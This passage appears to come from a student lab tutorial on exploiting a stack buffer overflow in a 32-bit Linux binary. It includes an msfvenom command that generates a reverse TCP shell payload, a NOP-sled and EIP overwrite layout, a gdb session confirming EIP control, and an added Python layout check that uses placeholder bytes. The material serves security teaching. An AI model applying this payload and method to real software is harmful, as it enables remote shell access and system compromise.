Shellcode
There are many ways to generate shellcode, for example with Donut or msfvenom. Before we can use shellcode in a buffer we need to know how large it will be.
$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 lport=31337 --platform linux --arch x86 --format c
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Our payload is 68 bytes. Reserve a larger range than that so the layout still works if the shellcode grows later. We can also insert no-operation instructions (NOPs) in front of our shellcode so that execution slides cleanly into it regardless of where exactly it lands.
We need 1040 bytes to reach the EIP.
Use an additional 100 bytes of NOPs.
Reserve 150 bytes for our shellcode.
Buffer = "\x55" * (1040 - 100 - 150 - 4) = 786
NOPs = "\x90" * 100
Shellcode = "\x44" * 150
EIP = "\x66" * 4
To verify how much space is available for our shellcode, we run the program with this layout and check that the EIP is still overwritten:
(gdb) run $(python -c 'print "\x55" * (1040 - 100 - 150 - 4) + "\x90" * 100 + "\x44" * 150 + "\x66" * 4')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/student/bow/bow32 $(python -c 'print "\x55" * (1040 - 100 - 150 - 4) + "\x90" * 100 + "\x44" * 150 + "\x66" * 4')
Program received signal SIGSEGV, Segmentation fault.
0x66666666 in ?? ()
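The same layout as a small sanity check, added here as an example rather than taken from the original page. It uses the page's own numbers (1040 bytes to the EIP, 100 bytes of NOPs, 150 bytes reserved, a 68-byte msfvenom payload) and only placeholder bytes in place of shellcode; the function name build_layout and the argument names are this example's own choices.

```python
# Added example (not from the original page): check that the filler | NOPs |
# shellcode | EIP layout adds up before feeding it to the program under test.
# The shellcode region is filled with the placeholder byte "\x44" exactly as the
# page does; no real shellcode is included here.

OFFSET_TO_EIP = 1040          # "We need 1040 bytes to get to the EIP"
NOP_SLED_LEN = 100            # "Use additional 100 bytes of NOPs"
SHELLCODE_RESERVED = 150      # "150 for our shellcode"
MSFVENOM_PAYLOAD_LEN = 68     # "Payload size: 68 bytes" from the msfvenom run


def build_layout(offset, nop_len, reserved, payload_len):
    """Return (buffer, filler_len) for the layout described on the page.

    filler_len follows the page's arithmetic: offset - nop_len - reserved - 4,
    so the whole buffer (filler + NOPs + reserved region + 4 EIP bytes) is
    exactly `offset` bytes long.  A ValueError signals a layout that cannot
    work: a payload larger than its reserved region, or an offset too small to
    hold the sled and reserved region in front of the EIP.
    """
    if payload_len > reserved:
        raise ValueError(
            f"payload is {payload_len} bytes but only {reserved} are reserved"
        )
    filler_len = offset - nop_len - reserved - 4
    if filler_len < 0:
        raise ValueError("NOP sled and reserved region do not fit before the EIP")

    filler = b"\x55" * filler_len
    nops = b"\x90" * nop_len
    shellcode = b"\x44" * reserved     # placeholder, stands in for the payload
    eip = b"\x66" * 4                   # recognisable marker: 0x66666666 on crash
    return filler + nops + shellcode + eip, filler_len


def region_offsets(offset, nop_len, reserved):
    """Return the start offset of each region, useful when comparing against
    what gdb shows on the stack after the crash."""
    filler_len = offset - nop_len - reserved - 4
    return {
        "filler": 0,
        "nops": filler_len,
        "shellcode": filler_len + nop_len,
        "eip": filler_len + nop_len + reserved,
    }


if __name__ == "__main__":
    buf, filler_len = build_layout(
        OFFSET_TO_EIP, NOP_SLED_LEN, SHELLCODE_RESERVED, MSFVENOM_PAYLOAD_LEN
    )
    print(f"filler={filler_len} total={len(buf)} regions={region_offsets(OFFSET_TO_EIP, NOP_SLED_LEN, SHELLCODE_RESERVED)}")
```

With the page's numbers the filler comes out to 786 bytes and the whole buffer to 1040, matching the python one-liner passed to gdb above; the spare 82 bytes in the reserved region are the headroom for a payload that grows later.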